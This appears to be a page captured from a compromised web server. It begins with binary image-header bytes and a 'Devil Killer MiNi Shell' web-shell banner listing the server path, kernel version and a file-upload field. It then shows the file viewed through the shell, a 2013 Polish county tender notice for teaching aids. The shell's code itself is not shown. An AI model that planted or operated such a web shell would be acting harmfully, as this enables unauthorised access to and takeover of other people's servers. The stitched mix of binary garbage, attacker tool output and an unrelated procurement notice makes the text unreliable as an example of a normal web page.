JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130927/198757-N-2013.html

<p class="kh_header"><b>Inowrocław: Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość</b><br>
<b>Numer ogłoszenia: 198757 - 2013; data zamieszczenia: 27.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Inowrocławski , ul. Roosevelta 36/38, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3592100, faks 052 3574820.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość. 
Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
Przedmiot zamówienia wykazany został w formularzach cenowych dla każdej z części stanowiące załączniki do SIWZ .
Szczegółowy opis przedmiotu zamówienia przedstawia opis techniczny przedmiotu zamówienia stanowiący załącznik nr 5 do SIWZ.
Jeżeli w opisie przedmiotu zamówienia znajdują się wskazania znaków towarowych, patentów lub pochodzenie, wykonawca może zaoferować przedmioty równoważne. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na wykonawcy.
Przedmioty, które posiadają karty gwarancyjne wykonawca zobowiązany jest dołączyć je w dniu dostawy.  
Wszystkie dostarczane artykuły muszą być oryginalnie pakowane, kompletne, fabrycznie nowe bez wad.
Wykonawca dostarczy przedmiot umowy nieodpłatnie własnym transportem, do siedziby Zamawiającego w godzinach pracy urzędu ul. Prezydenta Franklina Roosevelta 36-38, 88-100 Inowrocław pok. nr 156 . Przedmiot zamówienia wyszczególniony w zadaniu nr 9,10,11 Wykonawca dostarczy do Siedziby Centrum Kształcenia Praktycznego przy ul. Dworcowej 25, 88-100 Inowrocław. Przedmiot zamówienia określony w zadaniu nr 11 będzie dostarczany w sposób sukcesywny w zależności od potrzeb Zamawiającego. Wykonawca we własnym zakresie zapewni rozładunek dostarczonego przedmiotu umowy. Wykonawca po podpisaniu umowy uzgodni z Zamawiającym dokładną datę dostawy przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie przedstawionego oświadczenia z art. 22 ust. 1 ustawy Pzp. na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mątewska 17, 88-100 Inowrocław, pok. nr 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego, pokój nr: 144 - kancelaria ogólna ul. Prezydenta Franklina Roosevelta 36-38, 88-100 Inowrocław..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - Zajęcia pozalekcyjne z geodezji ogólnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń i oprogramowania na potrzeby zajęć pozalekcyjnych z geodezji ogólnej.
1.Niwelator optyczny z osprzętem - szt. 3
2.Węgielnica dj -2 (z pionem) - szt. 3
3. Szkicownik drewniany (bukowy) a4 - szt. 3
4. Program obliczeniowy WinKalk 3.9 (jednostanowiskowy) -wersja bazowa (lub równoważny) - szt. 10
5. Program wspomagający tworzenie dokumentacji robót geodezyjnych Operat lub równoważny (jednostanowiskowy) (9 szt. bez instrukcji, 1 szt. z instrukcją) - szt. 10
6. Program MikroMap (lub równoważny) - (jednostanowiskowy) - 10 szt.
7. Tradycyjna ruletka geodezyjno-budowlana do pomiaru długości - 30m - szt. 3
8. Tyczka teleskopowa pod lustro - 3 szt.
9.  Lustro do tachimetru - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 48.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne Kucharz Gastronomii- materiały ozdobne, akcesoria..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów ozdobnych  i akcesoriów na potrzeby zajęć pozalekcyjnych Kucharz Gastronomii
1.kostka zielona sucha typu Oasis  23x11x8 cm szt. 10
2.stożek typu Oasis Biosek wys. 40 cm szt. 3
3.osłonka ceramiczna kubik 17x17x7,5 cm, kolory: bordowa, zielona, granatowa, wrzosowa, złota szt. 5
4.osłonka łódka - korytko 24 cm, kolory: bordowa, zielona, granatowa, wrzosowa, złota szt. 5
5.koszyk bambusowy 12 cm  szt. 5
6.koszyk okrągły średnica 12 cm, kolory: zielony, żółty szt. 2
7.drut florystyczny miedziany na szpulce 100 g/70-80 m kolory: zielony, czarny szt. 2
8.fizelina dekoracyjna szer. 50 cm, dł. 7,3 m kolory: bordowa, fioletowa, różowa, żółta szt. 4
9.plastelina florystyczna (taśma) typu Fix Oasis 5 m szt. 1
10.nabłyszczacz do liści (750 ml) szt. 2
ozdoby wiosenne i wielkanocne 
11.kwiat sztuczny, pęk 6-ciu gałązek szt. 1
12.jajko z drewna z kokardą fioletowe szt. 1
13.kura z zieloną rafią fioletowa szt. 1
14.kura z zieloną rafią zielona szt. 1
15.kurka filcowa na drewnie fioletowa szt. 1
16.kurka filcowa na drewnie pomarańczowa szt. 1
17.jajo z kurczakiem zielone	szt. 1
18.zajączek duży, fioletowy 8/8 cm	szt. 1
ozdoby bożonarodzeniowe
19.gwiazda brokatowa, złota, duża, 36 cm szt. 1
20.kulki ratanowe, złote, średnica 4 cm,  12 szt/opakowanie op. 1
21.bombki szklane na druciku średnica 30 mm - czerwone matowe szt. 3
22.bombki szklane na druciku średnica 30 mm - srebrne szt. 3
23.bombki szklane na druciku średnica 30 mm - złote szt.	3
24.bombki szklane na druciku średnica 30 mm - wiśniowe	szt. 3
dekoracje walentynkowe
25.świece 40/80 mm, komplet 4 szt.	kpl. 1
26.kopi cone 10-15 cm, farbowane 8 szt/opakowanie - czerwone op. 1
27.titonia 4 cm, 12 szt./opakowanie - bordo	op. 1
28.serce drewniane, (z piórkiem, ze wstążeczką, na piku z różą, z aplikacjami białe, z rafią) szt. 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne Kucharz Gastronomii- narzędzia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa narzędzi i materiałów na potrzeby zajęć pozalekcyjnych Kucharz Gastronomii
1.Zestaw do wykonywania carvingu - 1 zestaw:
 a) 80 elementów do cięcia, rzeźbienia, wycinarki itp  - 2 szt. Jedna sztuka (zestaw walizkowy zawiera):
 - noże do cięcia
 - noże do rzeźbienia
 - wycinarki o różnych kształtach
 - noże do kulek
 - noże dekoracyjne V
 - noże okrągłe
 - dekoratory
 - obieraczki
 - noże karbowane
 - inne narzędzia do carvingu.
 b) 22 elementy dekorator, noże, punktaki itp. - 1 szt.
 jedna sztuka (zestaw walizkowy zawiera):
 - noże do obierania
 - dekorator do warzyw i owoców
 - nóż-piłę
 - dwustronny nóż do kulek
 - nóż w kształcie dziobu
 - punktak
 - obierak płaski
 - nóż pochyły
 - nóż karbowany
 - inne narzędzia do carvingu.		
2. Zestaw narzędzi wymaganych przy stosowaniu systemu HACCP w gastronomii - 1 zestaw, który zawiera:
a) deski do krojenia (600x400x20 ) kolory: zielona, brązowa, czerwona, żółta, niebieska, biała   -  6 sztuk
b) nóż zielony do jarzyn ze stali nierdzewnej - dł. 100 mm  - 1 sztuka - do warzyw i owoców, wykonany ze stali nierdzewnej, uchwyt z tworzywa, zgodnie z normami HACCP
c) nóż zielony kucharski  ze stali nierdzewnej- dł. 250 mm - 1 sztuka - do warzyw i owoców, wykonany ze stali nierdzewnej, uchwyt z tworzywa, zgodnie z normami HACCP
d) nóż brązowy kucharski ze stali nierdzewnej - dł. 260 mm - 1 sztuka - do gotowanych mięs, wykonany ze stali nierdzewnej, uchwyt z tworzywa, zgodnie z normami HACCP
e) nóż brązowy do mięsa gotowanego, przeznaczony do krojenia szynki  ze stali nierdzewnej- dł. 260 mm - 275 mm - 1 sztuka
f) nóż czerwony do filetowania  ze stali nierdzewnej - dł. 150 mm - 1 sztuka - do mięs, wykonany ze stali nierdzewnej, uchwyt z tworzywa, zgodnie z normami HACCP
g) nóż czerwony kucharski ze stali nierdzewnej - dł. 250 mm - 1 sztuka, do mięs 
h) nóż żółty do krojenia ze stali nierdzewnej - dł. 260 mm - 1 sztuka, do drobiu
i) nóż żółty kuchenny ze stali nierdzewnej - dł. 250 mm - 1 sztuka, do drobiu
j) nóż niebieski do filetowania ze stali nierdzewnej - dł. 175 mm - 1 sztuka, do ryb
k) nóż niebieski kuchenny ze stali nierdzewnej - dł. 250 mm - 1 sztuka, do ryb
l) nóż biały uniwersalny ze stali nierdzewnej - dł.130 mm - 1 sztuka - do pieczywa, nabiału i delikatesów
m) nóż biały kucharski  ze stali nierdzewnej- dl. 250 mm - 1 sztuka - do pieczywa, nabiału i delikatesów
n) nóż biały do chleba, ciast z ząbkowanym ostrzem ze stali nierdzewnej - dł. 300 mm - 1 szt. 
Wszystkie dostarczone narzędzia zestawu muszą być zgodne z wymogami i normami stosowanego w gastronomii systemu HACCP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.22.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia pozalekcyjne z programowania układów mikroprocesorowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa  zestawów dydaktycznych z oprogramowaniem i modelami na potrzeby zajęć pozalekcyjnych z programowania układów mikroprocesorowych
1. mikroprocesorowy zestaw dydaktyczny z oprogramowaniem - 5 szt.
2. modele dydaktyczne umożliwiające współpracę z dydaktycznym   zestawem mikroprocesorowym - 10 szt:
-model skrzyżowania drogowego - 2 szt.
-model tyrystorowego regulatora oświetlenia - 2 szt.
-model równi pochyłej - 2 szt.
-model zegara czasu rzeczywistego - 2 szt.
-model czytnika kart magnetycznych - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - zajęcia dydaktyczno -wyrównawczych z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa przyborów geometrycznych na potrzeby zajęć dydaktyczno -wyrównawczych z matematyki.
1.Przybory geometryczne - 255 zestawów 
jeden zestaw zawiera:
- linijka 20 cm (przezroczysty plastik) - 1 szt. 
- ekierka przezroczysty plastik, podziałka 15 cm)- 1 szt.
- cyrkiel z rysikiem (metalowy)- 1szt. 
- kątomierz (przezroczysty plastik) - 1 szt.
- ołówek (HB) - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - Zajęcia pozalekcyjne z projektowania architektury krajobrazu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa programu komputerowego na potrzeby zajęć pozalekcyjnych z projektowania architektury krajobrazu 
1.program komputerowy; do projektowania terenów zieleni - Gardenphilia DESIGNER lub równoważny. Wersja EDU - 10 stanowiskowa -  szt. 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - Zajęcia pozalekcyjne z obsługi kas fiskalnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa czytników i metkownic na potrzeby zajęć pozalekcyjnych z obsługi kas fiskalnych 
1. czytnik Kodów Kreskowych argox as 8000 lub równoważny - szt. 6
2. metkownica Dwurzędowa montip mx-2616 lub równoważna - szt. 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych (materiały, sprzęt i literatura) na potrzeby zajęć prowadzonych w ramach projektu pn. Twoja wiedza - Twoja przyszłość - Literatura.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia pozalekcyjne Kucharz Gastronomii
1. Technologia gastronomiczna z towaroznawstwem podręcznik dla zawodu kucharz małej gastronomii w zasadniczej szkole zawodowej część I, część II. autor: Małgorzata Konarzewska, Barbara Zielonka, Maria Konarzewska- Sokołowska -  szt. 10		
Zajęcia pozalekcyjne z zakresu spawania elektrycznego (metoda 111), metodą MAG (metoda 135)
1. Spawanie (materiały) - Piotr Piątek; Wydawca: SANNORT Sp. z o.o. w Sandomierzu - szt.10 		
2. Spawanie w osłonie gazów metodami MAG i MIG - Jerzy Mizerski -   szt. 10		
Zajęcia pozalekcyjne z geodezji ogólnej
1. Podręcznik Geodezja cz. 1 - A. Jagielski - szt. 15		
2. Przewodnik do ćwiczeń po geodezji I -  szt. 15		
Zajęcia pozalekcyjne z języka angielskiego
1. Repetytorium maturalne poziom podstawowy plus Testy My English Lab (komplet) Pearson Longman -  szt. 105		
2. Matura explorer. Pre-intermediate. Jon Naunton with Beata Polit, Wyd. Nowa Era - szt. 15		
3. My profession podręcznik z płytą dla ZSZ REA Monika i Marcin Mizak -  szt. 15		
Zajęcia pozalekcyjne z projektowania architektury krajobrazu
1. Katalog roślin - drzewa, krzewy, byliny wydawnictwo: Agencja Promocji Zieleni - szt. 30.</p></li>
